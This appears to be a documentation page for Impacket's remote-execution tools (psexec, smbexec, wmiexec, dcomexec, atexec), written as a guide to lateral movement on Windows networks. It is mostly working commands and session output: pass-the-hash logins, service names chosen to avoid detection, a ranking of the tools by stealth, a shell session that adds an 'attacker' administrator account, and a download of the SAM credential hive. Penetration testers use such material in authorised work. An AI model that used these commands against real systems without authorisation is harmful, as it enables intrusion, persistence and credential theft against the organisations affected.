Documentation Index Fetch the complete documentation index at: https://mintlify.com/fortra/impacket/llms.txt
Use this file to discover all available pages before exploring further.
Impacket provides multiple methods for executing commands on remote Windows systems, each using different protocols and execution contexts.
Tool Protocol Context Stealth Requirements psexec.py SMB + RemComSvc SYSTEM Low Admin, SMB access smbexec.py SMB + Service SYSTEM Low Admin, SMB access wmiexec.py WMI/DCOM User Medium Admin, DCOM ports dcomexec.py DCOM Objects User Medium Admin, DCOM ports atexec.py Task Scheduler SYSTEM Medium Admin, Task Scheduler
psexec.py PsExec-like functionality using RemComSvc. Executes commands as SYSTEM through a temporary service.
Basic Usage Interactive Shell
Single Command
File Upload & Execute
# Password authentication psexec.py DOMAIN/username:password@target # Pass-the-hash psexec.py DOMAIN/username@target -hashes :NTHASH # Kerberos authentication psexec.py DOMAIN/username@target -k -no-pass -dc-ip DC_IP
# Execute single command psexec.py DOMAIN/user:pass@target "whoami" psexec.py DOMAIN/user:pass@target "ipconfig /all" # Run PowerShell psexec.py DOMAIN/user@target -hashes :HASH "powershell -c Get-Process"
# Copy and execute a file psexec.py DOMAIN/user:pass@target -copy-file /path/to/file.exe # Specify custom service name psexec.py DOMAIN/user:pass@target -service-name CustomSvc
Advanced Options
Custom Service Configuration
# Custom service name (avoid detection) psexec.py domain/user@target -service-name WinDefendSvc # Custom remote binary name psexec.py domain/user@target -remote-binary-name svchost.exe
# Upload and execute binary psexec.py domain/user@target -copy-file payload.exe # Execute with arguments psexec.py domain/user@target -copy-file tool.exe "arg1 arg2"
# Custom SMB port psexec.py domain/user@target -port 8445 # Target IP (when DNS fails) psexec.py domain/user@hostname -target-ip 10.0.0.5
Example Output $ psexec.py CORP/admin:password@10.0.0.50 Impacket v0.12.0 - Copyright 2023 Fortra [ * ] Requesting shares on 10.0.0.50..... [ * ] Found writable share ADMIN$ [ * ] Uploading file HjKDpnmR.exe [ * ] Opening SVCManager on 10.0.0.50..... [ * ] Creating service RemComSvc on 10.0.0.50..... [ * ] Starting service RemComSvc..... [ ! ] Press help for extra shell commands C:\Windows\system32 > whoami nt authority \s ystem C:\Windows\system32 > hostname WIN-SERVER01
smbexec.py Executes commands through a temporary service without uploading a binary. Uses local SMB server in server mode.
Basic Usage Share Mode
Server Mode
Shell Types
# Use existing writable share smbexec.py DOMAIN/user:pass@target -share C $ smbexec.py DOMAIN/user@target -hashes :HASH -share ADMIN $ # Auto-detect writable share smbexec.py DOMAIN/user:pass@target
# Launch local SMB server (requires root for port 445) sudo smbexec.py DOMAIN/user:pass@target -mode server # With custom service name sudo smbexec.py DOMAIN/user@target -hashes :HASH -mode server -service-name svc
# CMD shell (default) smbexec.py domain/user:pass@target # PowerShell smbexec.py domain/user:pass@target -shell-type powershell
Characteristics Advantages
No binary upload required
Works with any writable share
Server mode for restricted environments
Disadvantages
Generates event logs (service creation)
Commands timeout if they run too long
Not fully interactive
Example $ smbexec.py CORP/admin@10.0.0.50 -hashes :8846f7eaee8fb117ad06bdd830b7586c Impacket v0.12.0 - Copyright 2023 Fortra [ ! ] Launching semi-interactive shell - Careful what you execute C:\Windows\system32 > net user attacker P@ssw0rd! /add The command completed successfully. C:\Windows\system32 > net localgroup administrators attacker /add The command completed successfully.
wmiexec.py Executes commands through WMI. Runs as the authenticated user (not SYSTEM) with less event log noise.
Basic Usage Interactive Shell
Single Command
No Output Mode
# Standard authentication wmiexec.py DOMAIN/user:password@target # Pass-the-hash wmiexec.py DOMAIN/user@target -hashes LMHASH:NTHASH # Kerberos wmiexec.py DOMAIN/user@target -k -no-pass
# Execute command and exit wmiexec.py DOMAIN/user:pass@target "hostname" wmiexec.py DOMAIN/user@target -hashes :HASH "ipconfig"
# Execute without retrieving output (stealth) wmiexec.py DOMAIN/user:pass@target -nooutput "command"
Advanced Features
# CMD shell (default) wmiexec.py domain/user:pass@target # PowerShell shell wmiexec.py domain/user:pass@target -shell-type powershell # Execute single PowerShell command wmiexec.py domain/user:pass@target -shell-type powershell "Get-Process"
# Use specific share for output wmiexec.py domain/user:pass@target -share C $ wmiexec.py domain/user:pass@target -share ADMIN $
# Upload file C:\ > lput /local/file.txt C: \W indows \T emp \f ile.txt # Download file C:\ > lget C: \W indows \S ystem32 \c onfig \S AM # Change local directory C:\ > lcd /tmp
Example Session $ wmiexec.py CORP/admin:P@ssw0rd@10.0.0.50 Impacket v0.12.0 - Copyright 2023 Fortra [ * ] SMBv3.0 dialect used [ ! ] Launching semi-interactive shell - Careful what you execute [ ! ] Press help for extra shell commands C:\ > whoami corp\admin C:\ > powershell -c "Get-WmiObject Win32_OperatingSystem | Select Caption" Caption ------- Microsoft Windows Server 2019 Standard
dcomexec.py Executes commands through DCOM objects. Supports multiple DCOM methods.
MMC20.Application
ShellWindows
ShellBrowserWindow
# Default method (Windows 7/10/Server 2012R2+) dcomexec.py DOMAIN/user:pass@target dcomexec.py DOMAIN/user:pass@target -object MMC20
# Alternative method dcomexec.py DOMAIN/user:pass@target -object ShellWindows
# Windows 10/Server 2012R2 dcomexec.py DOMAIN/user:pass@target -object ShellBrowserWindow
Usage Examples # Interactive shell with MMC20 dcomexec.py CORP/admin@10.0.0.50 -hashes :NTHASH # Single command execution dcomexec.py CORP/admin:pass@target -object ShellWindows "whoami" # PowerShell shell dcomexec.py CORP/admin@target -hashes :HASH -shell-type powershell # No output mode dcomexec.py CORP/admin:pass@target -nooutput "command"
atexec.py Executes commands via Task Scheduler. Runs as SYSTEM with less noise than service-based methods.
Basic Usage Standard Execution
Kerberos
Interactive Session
# Execute command and retrieve output atexec.py DOMAIN/user:password@target "whoami" atexec.py DOMAIN/user@target -hashes :HASH "ipconfig /all"
# Kerberos authentication atexec.py DOMAIN/user@target -k -no-pass "hostname" atexec.py DOMAIN/user:pass@target -k -dc-ip 10.0.0.1 "whoami"
# Execute PowerShell session (experimental) atexec.py domain/user:pass@target -session-id 1 "powershell"
Example $ atexec.py CORP/admin:P@ssw0rd@10.0.0.50 "whoami" Impacket v0.12.0 - Copyright 2023 Fortra [ ! ] This will work ONLY on Windows > = Vista [ * ] Creating task \h KtMjRxL [ * ] Running task \h KtMjRxL [ * ] Deleting task \h KtMjRxL [ * ] Attempting to read ADMIN$ \T emp \h KtMjRxL.tmp nt authority \s ystem
Stealth Priority
Reliability
Environment
Most Stealthy to Least:
wmiexec.py - Minimal event logs, runs as userdcomexec.py - DCOM-based, less common detectionatexec.py - Task Scheduler, moderate loggingsmbexec.py - Service creation logspsexec.py - Service creation + binary upload Most Reliable to Least:
psexec.py - Time-tested, most compatiblewmiexec.py - Very reliable, requires DCOMsmbexec.py - Reliable, some edge casesatexec.py - Generally reliable, Vista+dcomexec.py - Version-dependent DCOM objects When to Use Each:
psexec.py : Need SYSTEM, full compatibilitywmiexec.py : DCOM available, prefer stealthsmbexec.py : No writable shares, use server modeatexec.py : Task Scheduler available, need SYSTEMdcomexec.py : Alternative when others fail Common Issues
# Verify credentials work crackmapexec smb target -u user -p password # Check if user is local admin crackmapexec smb target -u user -p password --local-auth # Try different authentication method tool.py domain/user@target -hashes :NTHASH
Connection Refused / Firewall
# Test SMB connectivity (445) nc -zv target 445 # Test WMI/DCOM ports (135, 49152-65535) nmap -p 135,445 target # Use specific target IP tool.py domain/user@hostname -target-ip 10.0.0.5
Next Steps
Credential Dumping Extract credentials after gaining access
SMB Operations Browse shares and access files
LDAP Operations Enumerate and modify Active Directory
